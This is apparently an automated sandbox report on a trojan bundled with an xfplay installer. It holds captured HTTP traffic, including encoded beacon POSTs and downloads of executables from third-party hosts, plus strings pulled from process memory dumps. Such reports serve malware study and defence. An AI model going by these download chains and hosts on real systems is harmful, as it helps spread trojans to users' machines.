e=c.frag.cloneNode(),g=0,h=d(),i=h.length;i>g;g )e.createElement(h[g]);return e}function i(a,b){b.cache||(b.cache={},b.createElem=a.createElement,b.createFrag=a.createDocumentFragment,b.frag=b.createFrag()),a.createElement=function(c){return t.shivMethods?g(c,a,b):b.createElem(c)},a.createDocumentFragment=Function("h,f","return function(){var n=f.cloneNode(),c=n.createElement;h.shivMethods&&(" d().join().replace(/[\w\-:] /g,function(a){return b.createElem(a),b.frag.createElement(a),'c("' a '")'}) ");return n}")(t,b.frag)}function j(a){a||(a=b);var d=f(a);return!t.shivCSS||k||d.hasCSS||(d.hasCSS=!!c(a,"article,aside,dialog,fig

<<< skipped >>>

GET /Public/bootstrap/3.3.5/fonts/glyphicons-halflings-regular.eot? HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:52 GMT

Content-Type: application/vnd.ms-fontobject

Content-Length: 20127

Last-Modified: Tue, 16 Jun 2015 01:13:22 GMT

Connection: keep-alive

ETag: "557f7832-4e9f"

Accept-Ranges: bytes

.N..AM............................LP........................'..,..................(.G.L.Y.P.H.I.C.O.N.S. .H.a.l.f.l.i.n.g.s.....R.e.g.u.l.a.r...x.V.e.r.s.i.o.n. .1...0.0.9.;.P.S. .0.0.1...0.0.9.;.h.o.t.c.o.n.v. .1...0...7.0.;.m.a.k.e.o.t.f...l.i.b.2...5...5.8.3.2.9...8.G.L.Y.P.H.I.C.O.N.S. .H.a.l.f.l.i.n.g.s. .R.e.g.u.l.a.r.....BSGP.....................M..M..F..........(u...<.0D.B/X..N....CC.^...rmR2sk..PJ"5 .gl.W*i.W./E.....4#...U.~.f....UD........J.1./!../...s..7...k.....(...h.N..8o..d$yq..1...9..@.-..HG.....S".Fj....6C3..&......W51.....B..a..QaR.U/..{*......=.@d..h$..1.T..nc c..A......Z...@Q.c.a....l..2>.K....m.' ....C.HM..fB.X.,.Y....p.e......U....*...z..m...i..O1nE.......hx!aC.XT..V...........R....%...|I..H....P.5".b.N....=...r./_.R...._..%...uz.....5.2.....P.)........F.7S..q.F.{n.i.a....@D..s.;...}9....?.........R{.Tk.;.....U\N.Z..Q-.^.s..7.f.0....S3A..._n..`W.7P..p.....i...!.g./._p....Z.-=...~WZ#/.4 KF.`. ...z...0..|.D.........&d..I.......;.M..{'.om..m..I...!w.i9|H:..........{..~...q....O.........,. .L]&.J0...9/...9&.Y.....{;..'.3`..e..@v.H..y.DZ$...3....Dx28....W. Cx5x..w..B`.$C$'..El..y..h.......DJ.$(p.....QA.A..A.@'.$.h.p..0.V.0 `..s..e.$.4$"t2=f..4.A.{Tk..0|r.H........`.L&..s.h.]...A<.....`R.'...!...1N..;.._.t3.#. .......V....*ve.F`E. O$.{).W=p:....F`..2...2..C....^............G..<<?....~z.........>..p..Ne2....... Y.s..l:.........u5.....t.u.^8..6......Tmy.Q.%..u~...%~1r..a.w..^.._.Z..Z.a...0!.......N.`....uq....YB.\................[.e.....:@..J'E...,.3..ubj@.p........f.........eW9(.

<<< skipped >>>

GET /Public/images/sns_qq.png HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:53 GMT

Content-Type: image/png

Content-Length: 1851

Last-Modified: Tue, 19 May 2015 04:17:19 GMT

Connection: keep-alive

ETag: "555ab94f-73b"

Expires: Mon, 07 Dec 2015 04:59:53 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes

.PNG........IHDR.............h.......tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:38F721A94AC711E09F31828F5693D33B" xmpMM:DocumentID="xmp.did:38F721AA4AC711E09F31828F5693D33B"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:38F721A74AC711E09F31828F5693D33B" stRef:documentID="xmp.did:38F721A84AC711E09F31828F5693D33B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>_O1.....IDATx.b`..%E..L..z.wU.1........H......My............}C... ...|.............X.....Yy..0GEQ...\I^.?...m...XK....g../...6wY.......)qY....k..W........@..... 9..1_...'.v20..a`......;....}.....jJ.. 2..?5W.................Z..eT.3.L..'.......k.2..}...^.py?..u..F..b...[...*...........0..=..=..?33....(.......x......`D.T108..........5,..v.._$&..:.C...Fcc.....e.5.g..z...w...23D.K2\.r......>{..I....?~............R..s.......V.d`ccc............%........?.1.9...... ...A^..a..{P....P&..2..Q.....VoC\.....^.$..#.1H*.Fbhm].....,.!...&".H..... ...GDiz.n....m...-.....w...........e#`.O..x(...C.R *.......)=

<<< skipped >>>

GET /Public/jquery/1.11.3/jquery.min.js?1.0.247 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:55 GMT

Content-Type: application/javascript

Content-Length: 95992

Last-Modified: Wed, 19 Aug 2015 17:28:41 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "55d4bcc9-176f8"

Expires: Sat, 07 Nov 2015 16:59:55 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

/*! jQuery v1.11.3 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=c.slice,e=c.concat,f=c.push,g=c.indexOf,h={},i=h.toString,j=h.hasOwnProperty,k={},l="1.11.3",m=function(a,b){return new m.fn.init(a,b)},n=/^[\s\uFEFF\xA0] |[\s\uFEFF\xA0] $/g,o=/^-ms-/,p=/-([\da-z])/gi,q=function(a,b){return b.toUpperCase()};m.fn=m.prototype={jquery:l,constructor:m,selector:"",length:0,toArray:function(){return d.call(this)},get:function(a){return null!=a?0>a?this[a this.length]:this[a]:d.call(this)},pushStack:function(a){var b=m.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a,b){return m.each(this,a,b)},map:function(a){return this.pushStack(m.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushStack(d.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(a){var b=this.length,c= a (0>a?b:0);return this.pushStack(c>=0&&b>c?[this[c]]:[])},end:function(){return this.prevObject||this.constructor(null)},push:f,sort:c.sort,splice:c.splice},m.extend=m.fn.extend=function(){var a,b,c,d,e,f,g=arguments[0]||{},h=1,i=arguments.length,j=!1;for("boolean"==typeof g&&(j=g,g=arguments[h]||{},h ),"object"==typeof g||m.

<<< skipped >>>

GET /View/Home/Task//base.js?1.0.247 HTTP/1.1

Accept: */*

Referer: hXXp://VVV.meiheitou.com/?89-sd--ant-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.meiheitou.com

Connection: Keep-Alive

Cookie: sessionid=b1jtdrt74nrns94nt4ifo7m065

HTTP/1.1 200 OK

Server: nginx

Date: Sat, 07 Nov 2015 04:59:59 GMT

Content-Type: application/javascript

Content-Length: 17513

Last-Modified: Mon, 19 Oct 2015 06:32:55 GMT

Connection: keep-alive

Vary: Accept-Encoding

ETag: "56248e97-4469"

Expires: Sat, 07 Nov 2015 16:59:59 GMT

Cache-Control: max-age=43200

Accept-Ranges: bytes

/* @name daicuo.cc base.js..** @lasttime 2015-10-19..** @email 271513820@qq.com..** dc.scroll.page() .............................** dc.scroll.fixed($id,$top,$width) ..............** dc.scroll.totop($id,$top) ........................ ...CSS.......$id..** dc.click.nextpage(); ............(.........)..** dc.click.share(); .dc-share....................** dc.click.collect(); .dc-collect....................** dc.click.down(); .dc-down....................** dc.click.up(); .dc-up....................** dc.click.hits(); .dc-tj..........................** dc.key.down(); ..............** dc.user.islogin() .................. .dc-islogin..** dc.user.login() .................** dc.user.score() ........................ dc-user-score..** dc.task.bind() ............ #dc-task..** dc.load.cms(); ajax..............** dc.load.images(); ....................** dc.load.union($second); ..............** dc.load.hits($id); ....................** dc.cookie.set(name, value, days)..** dc.cookie.get(name)..** dc.cookie.del(name)..*/..dc.scroll = {...'page' : function(){....// ............... $(this).unbind("scroll");....$(window).bind('scroll', function(){.....var nexturl = $("#dc-nextpage").attr('data-href');.....if(nexturl == undefined){......return false;.....}.....var c = $(window).height();.....var t = $(document).scrollTop(); .....var h = $(document).height();.....if( h - t - c == 0 ){......$.get(nexturl (dc.page*1 1), function(data){.......if(data){........// .......................$("#dc-item").append(data);........// ..............

<<< skipped >>>

GET /CSC3-2010.crl HTTP/1.1

Accept: */*

User-Agent: Microsoft-CryptoAPI/5.131.2600.5512

Host: csc3-2010-crl.verisign.com

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

HTTP/1.1 200 OK

Server: Apache

ETag: "7c8bb8b999f19239c68f0bca1cf9491c:1446844256"

Last-Modified: Fri, 06 Nov 2015 21:10:56 GMT

Date: Sat, 07 Nov 2015 05:00:11 GMT

Transfer-Encoding: chunked

Connection: keep-alive

Connection: Transfer-Encoding

Content-Type: application/pkix-crl

00006000..0..D.0..C....0...*.H........0..1.0...U....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1;09..U...2Terms of use at https://VVV.verisign.com/rpa (c)101.0,..U...%VeriSign Class 3 Code Signing 2010 CA..151106210003Z..151120210003Z0..B.0!.....S.@.k....6..c..140730092631Z0!....c..k....D.k.....120708062201Z0!... _...u.t.=.<.&...130218061114Z0!...&..].....P.k.:...120125130117Z0!...7P.x....8.Q...s..130227010252Z0!...J.....Q..Y.[.....110404153956Z0!...d...=..q!_...g9..130729145216Z0!...d....Y.......o...140711083257Z0!...l.....h2<.H......120329152211Z0!...q.9...`H.*.Y.C...120525202212Z0!...s...TM.......0...121221080842Z0!...t..,.. ...eL.....130314222305Z0!...y..r.HW.v.....w..140423054643Z0!..../u.......A..5...101214165045Z0!.....0.Xc...%...iM..121102230226Z0!.......S.a&.X5t.E]..111206083350Z0!....c.(....B.[M83...140108164517Z0!....A.Sv.....f,.....110609003155Z0!.....z......!.ID{]..101228182208Z0!....b^......{d.J'...130102154110Z0!.......n........'u..140521222808Z0!......0..........I..130912181631Z0!.....1.;C,.. L..0...141111073655Z0!....6e...~..T.......130131012247Z0!.....|.....t.l.o....140827175301Z0!.........bD#*u......130226223939Z0!.......@..'$.).;}\..130121172259Z0!....7.v..........n..120724160733Z0!....n[..P..a.y...p..141121045513Z0!....P;.Y..d...c.(...120209181451Z0!.....].bb[.....!....140328205453Z0!.....a...L`..IV.....130402103508Z0!......fFW.z.....@T..130117000242Z0!...........].{7.....120730000000Z0!...".......Z.V.,.e..121031192224Z0!...'....[.1......g..130318195659Z0!...,GI.jH.|.

<<< skipped >>>

POST /query?cmd=validurl HTTP/1.1

Content-Length: 117

Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:06 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00067820760341062666110713

Server: Apache

tracecode: 00067820760341062666110713

Set-Cookie: BAIDUID=FD9EDA96E9FFC3CC3B14288B214300D1:FG=1; expires=Sun, 06-Nov-16 05:00:06 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /dlied6.qq.com/invc/xfspeed/qqpcmgr/versetup/portal/PCMgr_Setup_10_9_16345_222.exe?mkey=563da395da60d437&f=2384&p=.exe HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; QQPCMgr7.0)

Connection: Keep-Alive

Cache-Control: no-cache

Pragma: no-cache

Host: 103.7.29.215

HTTP/1.1 200 OK

Server: CDN_NWS_4.2.1

Connection: keep-alive

Date: Sat, 07 Nov 2015 05:00:16 GMT

Cache-Control: max-age=600, s-maxage=60

Expires: Sat, 07 Nov 2015 05:10:16 GMT

Last-Modified: Fri, 08 May 2015 02:43:07 GMT

Content-Type: application/octet-stream

Content-Length: 47240016

X-Cache-Lookup: Hit From Disktank

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)1..mP.KmP.KmP.K...KoP.KJ..KrP.KJ..K.P.KJ..K1P.K._.KhP.K._.KpP.KmP.K.Q.KJ..K.P.KJ..KlP.KJ..KlP.KRichmP.K................PE..L.....#..................p...@....................@...........................$......d...................................................[..............`...............................................@...............t.......@....................text...Yb.......p.................. ..`.rdata...{..........................@..@.data............`..................@....rsrc....[.......`...`..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

<<< skipped >>>

POST /query?cmd=url2finfo HTTP/1.1

Content-Length: 120

Connection: Keep-Alive

.#4H.......L..BH............................--./01ZG@E..]ULRQQ^$o16<,'=) d(# a)?#7;"8xjikhs40,....UV_T\Q_E...opqrstuvw

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 04:59:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=35991270750315632138110712

Server: Apache

tracecode: 35991270750315632138110712

Set-Cookie: BAIDUID=005B09C6D83A1A4B9146A82791018378:FG=1; expires=Sun, 06-Nov-16 04:59:59 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

GET /mmliao/MM-liao8863.exe HTTP/1.1

Host: mm.appkhh.com

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1

Connection: Keep-Alive

HTTP/1.1 302 Found

Date: Sat, 07 Nov 2015 05:00:00 GMT

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

X-AspNet-Version: 2.0.50727

Location: hXXp://down.appkhh.com:9000/mmliaonew/MM-liao8863.exe

Set-Cookie: ASP.NET_SessionId=unvtmf55i2o5pj550p3epgra; path=/; HttpOnly

Cache-Control: private

Content-Type: text/html; charset=utf-8

Content-Length: 808

<html><head><title>Object moved</title></head><body>..<h2>Object moved to <a href="hXXp://down.appkhh.com:9000/mmliaonew/MM-liao8863.exe">here</a>.</h2>..</body></html>....<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "hXXp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>.................</title></head>..<body>.. <form name="form1" method="post" action="../download/SubConfig.aspx?id1=8863" id="form1">..<div>..<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJNzgzNDMwNTMzZGQiFbVbBJv7A/lcSr1Og9mkU0lctw==" />..</div>..<div>...<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="9F81D7CC" />..</div>.. <div>.. .. </div>.. </form>..</body>..</html>....

GET /v1/t/full/p/mini/tn/10003408/ch_dl_url.exe HTTP/1.1

Host: j.br.baidu.com

Accept: */*

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1

Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently

Server: nginx/1.4.1

Date: Sat, 07 Nov 2015 04:59:59 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.4.22

Cache-Control: no-cache, must-revalidate

Expires: Sat, 26 Jul 1997 05:00:00 GMT

Location: hXXp://dlsw.br.baidu.com/package/201511/7c9ddd8b4b286eef807bc97513948574.exe

0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 117

Connection: Keep-Alive

.#4H.......I.l...........................................................................n.33455381%hdRjcOd`.:pnr....

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:03 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00033015391911494410110713

Server: Apache

tracecode: 00033015391911494410110713

Set-Cookie: BAIDUID=37CF03EF72C69E44C1FECBC156BA5EE4:FG=1; expires=Sun, 06-Nov-16 05:00:03 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /commit?cmd=finfo HTTP/1.1

Content-Length: 700

Connection: Keep-Alive

.#4H..........T.........................................a..................................................................................S8.....[3..

Z*.............V. !JWPU...MFBII..A@.P[X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..

.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\._...N...a6..T..Y".......{......{f...h

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:12 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00128049050818948618110713

Server: Apache

tracecode: 00128049050818948618110713

Set-Cookie: BAIDUID=2B26F61FAC88F8F0813C71ECDC5124A9:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 125

Connection: Keep-Alive

.#4H.......QC...............................y6...............................................................................

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:07 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00072362801213477898110713

Server: Apache

tracecode: 00072362801213477898110713

Set-Cookie: BAIDUID=A9AAE706CAC814E2200D085686071519:FG=1; expires=Sun, 06-Nov-16 05:00:07 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /commit?cmd=finfo HTTP/1.1

Content-Length: 700

Connection: Keep-Alive

.#4H..........T.........................................a..................................................................................S8.....[3..

Z*.............V. !JWPU...MFBII..A@.P[X.^VOY.D[MO%$&l546$%.8d("9!<>37{.....5,211>.VSZRUH..jklmnopqrstuvwxyz{|}~......M.....y.......8..w..u.....lB...<Sr..{...?.....9gO..

.....6V.......0.h<..u.g....."O...R...M]..t42.5.'...'a...W .ST.E...`t.;.....\. ....`.,w...09.\._...N...a6..T..Y".......{......{f...h

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:11 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00119517720658453514110713

Server: Apache

tracecode: 00119517720658453514110713

Set-Cookie: BAIDUID=2C7B1E2C3C0DA05794EB27122BF6134F:FG=1; expires=Sun, 06-Nov-16 05:00:11 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /commit?cmd=finfo HTTP/1.1

Content-Length: 543

Connection: Keep-Alive

.#4H........................................!#$%&"k." ,-.

.M.......

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:14 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00145449851213477898110713

Server: Apache

tracecode: 00145449851213477898110713

Set-Cookie: BAIDUID=E927C7BA6E0D653E6B7119B2F952D9BD:FG=1; expires=Sun, 06-Nov-16 05:00:14 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /commit?cmd=finfo HTTP/1.1

Content-Length: 543

Connection: Keep-Alive

.#4H........................................!#$%&"k." ,-.

.M.......

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:12 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00129075050581376522110713

Server: Apache

tracecode: 00129075050581376522110713

Set-Cookie: BAIDUID=2B26F61FAC88F8F0FC4D9B271683B1BE:FG=1; expires=Sun, 06-Nov-16 05:00:12 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

POST /query?cmd=validurl HTTP/1.1

Content-Length: 96

Connection: Keep-Alive

.#4H.......4.`d.............................8.>?@)674.ih%$d*<=%'8.1<9z;:40;4s..r..\]PTF..lmno

HTTP/1.1 302 Moved Temporarily

Date: Sat, 07 Nov 2015 05:00:01 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: close

Location: hXXp://static.tieba.baidu.com/tb/error.html?tc=00017557620315632138110713

Server: Apache

tracecode: 00017557620315632138110713

Set-Cookie: BAIDUID=69DAC83DF6D595A3324C44730134BB38:FG=1; expires=Sun, 06-Nov-16 05:00:01 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1

P3P: CP=" OTI DSP COR IVA OUR IND COM "

9a..<html>..<head><title>302 Found</title></head>..<body bgcolor="white">..<center><h1>302 Found</h1></center>..<hr><center>nginx</center>..</body>..</html>..0..

Map

The Trojan connects to the servers at the folowing location(s):

Strings from Dumps

xianfeng.exe_272:

.text

`.rdata

@.data

.ndata

.rsrc

RegDeleteKeyExW

Kernel32.DLL

PSAPI.DLL

%s=%s

GetWindowsDirectoryW

KERNEL32.dll

ExitWindowsEx

USER32.dll

GDI32.dll

SHFileOperationW

ShellExecuteW

SHELL32.dll

RegDeleteKeyW

RegCloseKey

RegEnumKeyW

RegOpenKeyExW

RegCreateKeyExW

ADVAPI32.dll

COMCTL32.dll

ole32.dll

VERSION.dll

pG.lH

d&.iH

(1v%f M*

.na;T

%SCCg

HJ.Wr

Nullsoft Install System v2.46-Unicode

verifying installer: %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

%u.%u%s%s

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

*?|/":

E~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp

OCALS~1\Temp\nsf4.tmp\System.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\modern-wizard.bmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp\ioSpecial.ini

ttp://VVV.xfplay.com

8.9.0 P2P

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf4.tmp

nsf4.tmp

\Temp\nsf4.tmp\ioSpecial.ini

8-246WCGQ598DE}) i .r1 ?e

.2900.5512

m\LOCALS~1\Temp\nsf4.tmp

nfeng.exe

6.0.2900.5512

xianfeng.exe

"%Program Files%\xfplay\xianfeng.exe"

%Program Files%\xfplay

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsf3.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

%Program Files%\xfplay\xianfeng.exe

554304191

1.1.2.1

9.0.1 P2P

iexplore.exe_1676:

%?9-*09,*19}*09

.text

`.data

.rsrc

msvcrt.dll

KERNEL32.dll

NTDLL.DLL

USER32.dll

SHLWAPI.dll

SHDOCVW.dll

Software\Microsoft\Windows\CurrentVersion\Explorer\BrowseNewProcess

IE-X-X

rsabase.dll

System\CurrentControlSet\Control\Windows

dw15 -x -s %u

watson.microsoft.com

IEWatsonURL

%s -h %u

iedw.exe

Iexplore.XPExceptionFilter

jscript.DLL

mshtml.dll

mlang.dll

urlmon.dll

wininet.dll

shdocvw.DLL

browseui.DLL

comctl32.DLL

IEXPLORE.EXE

iexplore.pdb

ADVAPI32.dll

MsgWaitForMultipleObjects

IExplorer.EXE

IIIIIB(II<.fg>

7?_____ZZSSH%

)z.UUUUUUUU

,....Qym

````2```

{.QLQIIIKGKGKGKGKGKG

;33;33;0

8888880

8887080

browseui.dll

shdocvw.dll

6.00.2900.5512 (xpsp.080413-2105)

Windows

Operating System

6.00.2900.5512

BaiduP2PService.exe_472:

.text

`.rdata

@.data

.rsrc

t%SSSPj

SWSShX

D$%SP

tGHt.Ht&

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- floating point support not loaded

.mixcrt

KERNEL32.DLL

mscoree.dll

GetProcessWindowStation

USER32.DLL

operator

kernel32.dll

127.0.0.1

do exit check, update available=%d

xbdyy is running, %d connections

ProcessRequest spend too much time to finish, Cmd=%d, time = %d ms

tcp peer closed

tcp connection error

API Call: Type = -

StartTask: h = 0x%p, r=%d

StopTaskAsync: h = 0x%p, r=%d

StopTaskSync: h = 0x%p, r=%d

FreeTaskHandle: h = 0x%p, r=%d

BatchOperation: h = 0x%p, r=%d

GetTask List,nRet=%d

CreateTask: h = 0x%p,r=%d

DelTempFile: %s\%s

DelResumeInfo: %s\%s

GetTaskInfo: h = 0x%p, Ret=%d, StatCode=%d, nDownload=%d

set playing task, handle = %u

set playing bitrate = %u

set download queue length = %u

set autoupdate on = %u

set lang id = %u

read length %d, bad boy, closed

Read nOff=I64i,nLength=d,nRet=%d

GET /config/status.html

HTTP/1.1 200 OK

1.3.6.1.4.1.311.2.1.12

1.2.840.113549.1.9.5

1.2.840.113549.1.9.6

[d-d-d d:d:d.d]

%%x

Resume Finish [%d]

pending request at pid=%I64i timeout %d, clear

pending request at pid=%I64i,uids=%I64i,%I64i, timeout=%d, cancel, elapse=%d,duplicate alloc %d

no retransmit 3,%d%%, tPending=%d

leave emergency, nSpeedTotal=%d, peer speed=%d, rank=%d

alloc no piece to %I64i, %d pending, %d partial, %d tail partial, blockset=%d

block done, remove reserve state : peer id=%I64i, blockid=%d

%I64i have %d

Acc got qid=%s, domain=%s

Acc got no qid, ret=%d, deny acc

XXXXXXXX

Acc got host=%u.%u.%u.%u:%u

XXX

GET %s HTTP/1.1

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)

Host: %u.%u.%u.%u:%u

Key: %s

%snOffset=%I64i,%d

%d.%d.%d.%d

Task ID = u

Peers Passive = i

Time Get Login = i ms

Time Login = i ms

Lan IP = %s

Wan IP = %s

%s : attention, read file buf the filesize is %I64i, nToRead=%I64i,index=%u

%s : attention, it should not be here,read at %I64u(%I64u), no data, return

